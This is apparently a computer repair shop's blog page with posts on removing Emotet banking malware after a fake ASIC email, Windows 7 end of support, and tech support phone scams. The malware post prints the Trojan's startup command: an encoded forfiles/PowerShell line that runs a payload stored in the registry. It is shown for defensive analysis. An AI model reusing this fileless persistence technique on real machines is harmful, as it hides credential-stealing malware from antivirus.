Analyzing File-less Banking Malware

This malware appears to have originated from an email claiming to be ASIC Messaging Service. It advises the user that their business name is due for renewal . The link within the email does not take the user to the ASIC website, but instead links to a website for a community newspaper.  This website appears to have at some stage been compromised. A page had been added that automatically forwards the user to another malicious website. This is where malware was downloaded onto the clients PC.

For those who are interested in the more technical details, I wont link directly to the pages, but the Virus Total page for the original link can be found here.  The link in which it redirects to is no longer available but the Virus Total page can be viewed here.  The second link has been marked by a member of the Virus Total community as ASIC phising/malware.

I was investigating the Malware infection for a client after the fact. At the time the client clicked the link (browser history verified link was clicked) a java script file appears to have been downloaded onto the machine. Virus TotalHybrid Analysis links.

It is easy to blame the victim in these cases, but some phishing emails have become so well put together that anyone could fall for it.

The client had noticed after this time a command prompt window would flashed up on the screen upon Windows start up.

There was also a line at the bottom that I missed in the screenshot that read:

ERROR: Access is denied for “C:\WINDOWS\System32\winevt\”

At this time the clients bank contacted them to advice that their PC was infected with a Banking Trojan.

Removing File-less Banking Malware

I had no luck removing the malware with KVRT and had to proceed with a manual approach. ESET, my go to AV, did not detect the malware, nor did Windows Defender.

KVRT showed the infection as:

MEM:Trojan-Banker.multi.Emotet.gen.

Upon inspecting the startup, a command that utilizes a trusted Windows executable file, was set to run each bootup.

The command was:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c “cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAXABJAGQAZQBuAHQAaQB0AGkAZQBzAFwAewA0ADYANABBAEUARABGADUALQAwADUAQwA3AC0AQgA2ADYAMQAtADEANwAxADIALQBBADkANQA5ADcAOAAyADkAQgBFADQARAB9ACcAKQAuAFQA”

When the text is decoded the command is:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c “cmd /c @file -ec iex (gp ‘HKCU:\\Identities\{464AEDF5-05C7-B661-1712-A9597829BE4D}’).T”

Base64 text can be decoded using Certutil found in C:\WINDOWS\System32\

i.e. certutil.exe -decode encoded.txt decoded.txt

Base64 can also be decoded using an online service such as https://www.base64decode.org/.

Forfiles has been set to run each start up and load the malware from the registry into the memory. This avoids it writing to disk and helps to prevent detection.

While I didn’t analyse exactly what EMOTET was doing, banking malware is designed to steal login credentials. The password is captured when you log into your bank and is sent back to a server that the attacker controls. Often with banking malware screenshots are taken to allow the attacker to capture other information such as funds available and account numbers.

Protecting yourself

Antivirus is not the magical safe guard it is often made out to be. It is still a great idea to have some kind of antivirus running on your device, but there are other task you can do to protect yourself or your business.

Train against phishing – It is simple for most home users; don’t click links, and avoid attachments from people you don’t know. But for business users, it is a littler harder. Many staff members jobs involve clicking links and opening attachment. This is why user training is important. Take a Phishing IQ Test.

Remove administrator privileges – I have covered this previously. Taking away administrator privileges can often limit what foothold malware can gain on your device.

Keep your software up to date – Some malware will exploit known vulnerabilities in your operating system or software. Windows users can install updates for the Operating System via Windows Updates (Windows Key + R, type control update, press enter, and click Check for updates). Software can be easily updated using Patch my PC.

Ask for help – If you receive an email that does not seem right, call a trusted friend or ask a colleague (If your business has in house IT staff start here). Sometimes talking out loud will help you tell if something is genuine or not.

Read our other articles and share will your friends – I have covered many other tech tips topics. Read them and share them with your friends.

Windows 7 End of Extended Support

Windows 7 was first released to the public on October 22nd, 2009. As with most software released by Microsoft, it’s life cycle is roughly 10 years.

Microsoft support their products for the first 5 years under mainstream support. The software will receive new features, complimentary phone support, and patches for vulnerabilities. Mainstream support ended for Windows 7 on January 13th, 2015. The product then moved into extended support.

With extended support, the product continues to receive patches for vulnerabilities to keep the device secure. The software no longer receives new features and users no longer receive complimentary phone support. Extended Support for Windows 7 will continue until January 12th, 2020 – which at time of writing is about 14 months.

Windows 7 will still work after extended support ends, but you will be left vulnerable to any zero-day vulnerabilities that are discovered after the support cut off.  A cyber criminal could exploit these vulnerabilities to gain access to your personal data, or use your device and bandwidth for illegal activities.

What should you do?

Plan to upgrade well before the extended support period ends. If you had opted in to receive Windows 10 upgrade when it was first released, installing this now would be your cheapest option to stay up-to-date.

Windows 10 can be purchased and installed via an in-place upgrade if you missed the free upgrade. This varies in price depending on the version you require.

Any device that runs Windows 7, should run Windows 10. If you find your devices is getting slow it may be a good time to look at upgrading your device to something with higher specs that already has Windows 10 installed.

If buying a new device is out of your range, there are plenty of lightweight Linux distributions available. Linux Mint, or Lubuntu are both easy to use and work well on older hardware. Linux distributions come packed with plenty of software, so you can hit the ground running.

Whatever route you take, don’t leave it to the last minute. Start planning your upgrade now to ensure that you are going to keep your devices secure and safe from malware or cyber criminals.

Tech Support Scam (Update September 2018)

Tech support scams have made a resurgence in Grenfell. The scam is nothing new, and the same old scare tactics are being implemented.

Usually, an unsolicited call from a person claiming to be a representative of Telstra, or another well-known company, will claim that your computer has been hacked.

Another tactic being used is an automated call advising you that your “internet has been compromised” and that it will be cut off if you don’t act promptly. You are then required to call the scammer yourself.

The first thing to note here is that Telstra, Microsoft, or any of the other companies that the caller claims to be, will not call you out of the blue to help with your “hacked” device.

Often with these calls, you will notice a delay before you can hear the person on the other end. This can be an indication that the caller may be a scammer.

The scammer will talk you through the steps to open Windows Event Viewer. Event Viewer keeps logs of what is happening on your machine. This includes a section that shows all the errors that have occurred on your device.

It is a simple program to open; hold the windows key and press R, type in eventvwr and press enter.

To the end user, the number of errors in event viewer looks to be of concern – and that is what scammer is praying on.

Unless you are having noticeable trouble with your device. The errors should not be of any concern.

They are not “hacking attempts” as the scammer will try to tell you.

If, so far, the scammer has convinced you that he is legitimate, you will be talked through installing a remote access tool such as Team Viewer.

There are many other remote access tools that have been used.

These remote access tools are legitimate programs and will not be flagged as malicious by your antivirus. The scammer is just using the tool for malicious purposes. Much like a brick is used to build a house, it can also be used as a “tool” to break into a house.

The scammers tactics vary from this point onward.

In some cases the scammer will ask for access to the victims bank account. The premise being that hackers are trying to hack in. Once the victim logs in on behalf of the scammer, the scammer is then able to transfer funds to his own accounts.

Other scammers have installed free software to “fix” the device, after which they charge a fee – in some cases up to $1200.

Once you have allowed remote access to your machine, there is nothing stopping the scammer from setting up a backdoor, stealing personal data, or from simply deleting files.

Whatever the outcome, it is all bad for the victim.

What can you do to avoid these scams

Caller ID: If your phone supports caller ID, screen your calls. If you do not recognize the number, or the number is private, don’t answer the phone.

Of course, use this to your discretion. If you are expecting a call this week from the doctors, you may need to answer that private caller.

Don’t call back: Ignore the automated message advising you to call back on a certain number. This tactic makes the scammers work a lot easier because you have called them and essentially lowered your guard. Sometime the numbers can be a premium service, meaning you may be paying per minute to talk to them.

Call a Friend: If you do get a call and you are not sure, use your mobile (if you have one) and call a trusted friend or family member. Sometimes just talking out loud to someone else will help the scam stand out.

Obtain a Silent Number: Telstra have removed fees associated in having a silent number. This keeps your details out of the White Pages and online directories.  Fees may still apply for other telephone providers. To activate this, call your telephone provider.

Register on the Do Not Call: This isn’t going to stop a malicious caller, but it will prevent some of the legitimate (but still annoying) telemarketing calls.

Educate your friends and family: Share this article with your friends and family. The more we talk about the scams going around, the less likely we are to fall for them.

Scamwatch is run by the ACCC. It provides information to consumers and small businesses about how to recognise, avoid, and report scams.

Our Tech Tips articles also have great tips on protecting yourself online, so do check them out as well.

Computer Maintenance & Repairs, Custom Built Computers, Laptops and more.